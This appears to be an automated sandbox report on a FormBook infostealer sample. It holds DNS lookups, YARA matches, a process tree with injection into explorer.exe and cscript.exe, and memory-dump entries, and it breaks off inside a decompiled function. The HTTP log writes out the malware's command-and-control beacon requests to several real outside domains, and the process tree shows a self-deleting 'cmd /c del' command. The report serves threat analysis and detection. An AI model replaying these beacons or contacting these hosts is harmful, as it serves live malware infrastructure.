                                Nov 25, 2021 15:10:59.496768951 CET | 192.168.2.5 | 8.8.8.8 | 0xcd40 | Standard query (0) | www.thejohnmatt.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:05.443424940 CET | 192.168.2.5 | 8.8.8.8 | 0x841d | Standard query (0) | www.securebankofamericalog.site | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:10.502841949 CET | 192.168.2.5 | 8.8.8.8 | 0xdf5d | Standard query (0) | www.onlinedatingthaiweb.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:21.011703014 CET | 192.168.2.5 | 8.8.8.8 | 0x5040 | Standard query (0) | www.trenddoffical.com | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Nov 25, 2021 15:10:30.595156908 CET | 8.8.8.8 | 192.168.2.5 | 0xb6ee | No error (0) | www.tremblock.com |  | 185.53.178.53 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:35.723468065 CET | 8.8.8.8 | 192.168.2.5 | 0x71a6 | No error (0) | www.rcepjobs.com |  | 3.64.163.50 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:40.961405993 CET | 8.8.8.8 | 192.168.2.5 | 0x9af3 | Name error (3) | www.sosibibyslot.website | none | none | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:46.186077118 CET | 8.8.8.8 | 192.168.2.5 | 0x9e9c | No error (0) | www.downingmunroe.online |  | 209.17.116.163 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:54.490019083 CET | 8.8.8.8 | 192.168.2.5 | 0x579a | Name error (3) | www.blueprintroslyn.com | none | none | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET | 8.8.8.8 | 192.168.2.5 | 0xcd40 | No error (0) | www.thejohnmatt.com | thejohnmatt.com |  | CNAME (Canonical name) | IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET | 8.8.8.8 | 192.168.2.5 | 0xcd40 | No error (0) | thejohnmatt.com |  | 192.232.250.147 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:05.481781960 CET | 8.8.8.8 | 192.168.2.5 | 0x841d | Name error (3) | www.securebankofamericalog.site | none | none | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:10.580288887 CET | 8.8.8.8 | 192.168.2.5 | 0xdf5d | No error (0) | www.onlinedatingthaiweb.com |  | 185.53.179.91 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:21.075328112 CET | 8.8.8.8 | 192.168.2.5 | 0x5040 | Name error (3) | www.trenddoffical.com | none | none | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.tremblock.com
                                • www.rcepjobs.com
                                • www.downingmunroe.online
                                • www.thejohnmatt.com
                                • www.onlinedatingthaiweb.com

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.5 | 49784 | 185.53.178.53 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:30.644892931 CET | 9620 | OUT | GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.tremblock.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:30.664594889 CET | 9620 | IN | HTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:10:30 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.5 | 49786 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:35.747081041 CET | 14112 | OUT | GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.rcepjobs.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:35.767437935 CET | 14112 | IN | HTTP/1.1 410 Gone
                                Server: openresty
                                Date: Thu, 25 Nov 2021 14:10:35 GMT
                                Content-Type: text/html
                                Transfer-Encoding: chunked
                                Connection: close
                                Data Ascii: 7<html>9 <head>4c <meta http-equiv='refresh' content='5; url=http://www.rcepjobs.com/' />a </head>9 <body>38 You are being redirected to http://www.rcepjobs.coma </body>8</html>0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                2 | 192.168.2.5 | 49816 | 209.17.116.163 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:49.310664892 CET | 15995 | OUT | GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.downingmunroe.online
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:49.426548958 CET | 15996 | IN | HTTP/1.1 400 Bad Request
                                Server: openresty/1.17.8.2
                                Date: Thu, 25 Nov 2021 14:10:49 GMT
                                Content-Type: text/html
                                Content-Length: 163
                                Connection: close
                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                3 | 192.168.2.5 | 49838 | 192.232.250.147 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:59.895478964 CET | 16019 | OUT | GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.thejohnmatt.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:01.556123972 CET | 16020 | IN | HTTP/1.1 301 Moved Permanently
                                Date: Thu, 25 Nov 2021 14:11:01 GMT
                                Server: nginx/1.17.9
                                Content-Type: text/html; charset=UTF-8
                                Content-Length: 0
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Location: http://thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN
                                X-Endurance-Cache-Level: 0
                                X-nginx-cache: WordPress
                                X-Server-Cache: true
                                X-Proxy-Cache: MISS


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                4 | 192.168.2.5 | 49839 | 185.53.179.91 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:11:10.615487099 CET | 16021 | OUT | GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.onlinedatingthaiweb.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:10.632399082 CET | 16021 | IN | HTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:11:10 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                System Behavior

                                General

                                Start time:15:09:07
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0xa80000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:15:09:10
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Imagebase:0xde0000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Start time:15:09:12
                                Start date:25/11/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Start time:15:09:37
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                Imagebase:0xa50000
                                File size:143360 bytes
                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                General

                                Start time:15:09:44
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:09:45
                                Start date:25/11/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis

                                  Executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.241476862.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.241476862.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlEncodePointer.NTDLL(00000000), ref: 02BC47CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.241476862.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID:
                                  • API String ID: 2118026453-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlEncodePointer.NTDLL(00000000), ref: 02BC4522
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.241476862.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID:
                                  • API String ID: 2118026453-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlEncodePointer.NTDLL(00000000), ref: 02BC4522
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.241476862.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID:
                                  • API String ID: 2118026453-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: iPT
                                  • API String ID: 0-1861935364
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb6645a6d95b42fcd322a6c5cae39ef25cb6de20ff84766c1c6d80c274f847ca
                                  • Instruction ID: 8789a6cf8838f08f7582a55df38deddb8f56314c0f034e5d3b1f7e787a39b5d8
                                  • Opcode Fuzzy Hash: eb6645a6d95b42fcd322a6c5cae39ef25cb6de20ff84766c1c6d80c274f847ca
                                  • Instruction Fuzzy Hash: 7A01AF70D10209EFCB40DFA8D485A9DBBF5FB49314F108AAAD915A7315D3709A80CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8178549187e39ec5ff1df0076e4e090253ba83f14da91591e08ad0217c82b6a1
                                  • Instruction ID: 43de0961dd8def9e7e7747fe1f698c99319798f47bafb3595bec0d6450488011
                                  • Opcode Fuzzy Hash: 8178549187e39ec5ff1df0076e4e090253ba83f14da91591e08ad0217c82b6a1
                                  • Instruction Fuzzy Hash: 5F01B274D00209EFCB40EFA8D485A9DBBF5FB48304F108AA5D914A7355D770AA80CF85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 343e4c46c0021679389992ef7aca147827576cc6cdcd58265fa3fe7f04a50b00
                                  • Instruction ID: 725fb41289d28eaea7adbbb1c015cbca92ae542a12e8d7d2905001267d1925b4
                                  • Opcode Fuzzy Hash: 343e4c46c0021679389992ef7aca147827576cc6cdcd58265fa3fe7f04a50b00
                                  • Instruction Fuzzy Hash: 30E06D72B001246F9314DAAEDC84C6BBBEEEBCD674355813AF50DC7310DA309C0187A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5094db5a7b0886af9814ff51d13c1e158204286811744a05265bdd0f52048ee8
                                  • Instruction ID: 8b94218e6df9100ea18fd45f68ca26a01411c035169d877048a3335cd11f9d00
                                  • Opcode Fuzzy Hash: 5094db5a7b0886af9814ff51d13c1e158204286811744a05265bdd0f52048ee8
                                  • Instruction Fuzzy Hash: 62F058B0D08208ABDB54DFA8D8467EEBBF8FB04300F0086AAC818A3740EB7056418B45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46d3aef7c858d2993ca7e8a167e9ef2f196f95166a10e5b0482d06249f08ac8d
                                  • Instruction ID: cc932a58bdb6c63e79656decab2092dc57edad5ee74ab2d06a6db2f07094e615
                                  • Opcode Fuzzy Hash: 46d3aef7c858d2993ca7e8a167e9ef2f196f95166a10e5b0482d06249f08ac8d
                                  • Instruction Fuzzy Hash: C7F058B4D00208EFDB04DFE8D944AAEFBB1FB48300F1082AAD814A3344DB350A41CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa199f7dcb28f51c9d94ebf7471e0d02e8f6e85a025dae69752462553d00e4b8
                                  • Instruction ID: 49511a19ba13e0fa5adecb5ddaafe5d5867a2576ba13dab282654f07bdb71ff6
                                  • Opcode Fuzzy Hash: aa199f7dcb28f51c9d94ebf7471e0d02e8f6e85a025dae69752462553d00e4b8
                                  • Instruction Fuzzy Hash: 82E0E63135011027E60921559C17FB7754ED7C1B50F14806AF6069B685DED26D1A42D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38d3f910532eebc105a7e32b89b3081867932acce792eda40c900283f203e756
                                  • Instruction ID: 562af8138d59f74ef4acb6cc917e5386d3832725c1138319ffc2cac5fd737701
                                  • Opcode Fuzzy Hash: 38d3f910532eebc105a7e32b89b3081867932acce792eda40c900283f203e756
                                  • Instruction Fuzzy Hash: 03E0C2B4D08208AFDB44EFE9D8416ADBBF5FB48300F0095AA8828A3304EB705A41CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96c0c7a277e171d11845a71888af36a9683394b836d4e5525712a4af846fa0b2
                                  • Instruction ID: 5547925dd0527499d91f59c8507bd429e03963fd6ca01bc36d2001ca2507b909
                                  • Opcode Fuzzy Hash: 96c0c7a277e171d11845a71888af36a9683394b836d4e5525712a4af846fa0b2
                                  • Instruction Fuzzy Hash: 68F0E575A0210CCFCB40EFA4EA825EDBB70EF4220872085E5D80CD3302D7306E0ADB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97fcde7381850a7bfed954530d92822c5e7f4be1b7a3724f2e96815e5609efc5
                                  • Instruction ID: 41444895be42cafff138023392703bd84306644bef218201b72001491a3f25f7
                                  • Opcode Fuzzy Hash: 97fcde7381850a7bfed954530d92822c5e7f4be1b7a3724f2e96815e5609efc5
                                  • Instruction Fuzzy Hash: 1BE02B327001104FCB04D619D809B9237FCDF48355FA01076F406C7761DE60DC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 378ad98cf22ded416ba97ac41456d9cbd7ff4948ba7b1753d7315daec7545009
                                  • Instruction ID: 31beac768312333f84c69116a1b28ed1b0a08d3606e99971af36f737a8920668
                                  • Opcode Fuzzy Hash: 378ad98cf22ded416ba97ac41456d9cbd7ff4948ba7b1753d7315daec7545009
                                  • Instruction Fuzzy Hash: 5CE0867591110CEFCB40FFA4E9028AEBBB9EB453087108499E80993304EB317F059F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1723a34f86d71a294030eb7674da00f87c8723082dc983835c4d1a00cd54a559
                                  • Instruction ID: 68e73770b1b874b5e42fd18897860436215d422ebbb68744a58e513ee8282551
                                  • Opcode Fuzzy Hash: 1723a34f86d71a294030eb7674da00f87c8723082dc983835c4d1a00cd54a559
                                  • Instruction Fuzzy Hash: 40D0C9317102148FC708DB5DE44499537EDEF8D6A575040BAF50ACB3A1DEA1AC419B81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1c242ab72343e3767fc1a135e2c943cc73237b20db493ce8711135b28194c36
                                  • Instruction ID: b4c29227eb318a99c7f097cc86aec4c909772f6cc0b81a70c92adce5b783e561
                                  • Opcode Fuzzy Hash: d1c242ab72343e3767fc1a135e2c943cc73237b20db493ce8711135b28194c36
                                  • Instruction Fuzzy Hash: 28D05E71720109A7CB009F55E88AA9A7F66BF44360F08C420F4554E611CA71D814DF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2644debe30ad835e065a31e1fb54f1a7f17e00d931488cdb30846f1df934c21
                                  • Instruction ID: 845bc10f6d3216e4e3163a6899ca1e3909d22d9e21dc84213bace34662991d99
                                  • Opcode Fuzzy Hash: c2644debe30ad835e065a31e1fb54f1a7f17e00d931488cdb30846f1df934c21
                                  • Instruction Fuzzy Hash: D4C08C31200208ABCB00AF81E80988A7F6AEB88261704C020F80942220CF71E810AEA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.240468071.0000000000A82000.00000002.00020000.sdmp, Offset: 00A80000, based on PE: true
                                  • Associated: 00000000.00000002.240447719.0000000000A80000.00000002.00020000.sdmp

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false

                                  Executed Functions

                                  C-Code - Quality: 36%
                                  			E0041870C(void* __eflags, long _a4, void* _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                  				void* _v1;
                                  				intOrPtr* __esi;
                                  				void* __ebp;
                                  				signed char _t11;
                                  				void* _t15;
                                  				void* _t16;
                                  				intOrPtr* _t22;
                                  
                                  				asm("outsd");
